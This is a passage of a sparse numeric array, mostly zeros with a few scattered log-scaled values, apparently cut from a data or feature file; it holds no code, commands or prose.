0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 4.976733742420574, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.93848385770662, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.9120230054281455, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 3.044522437723423, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 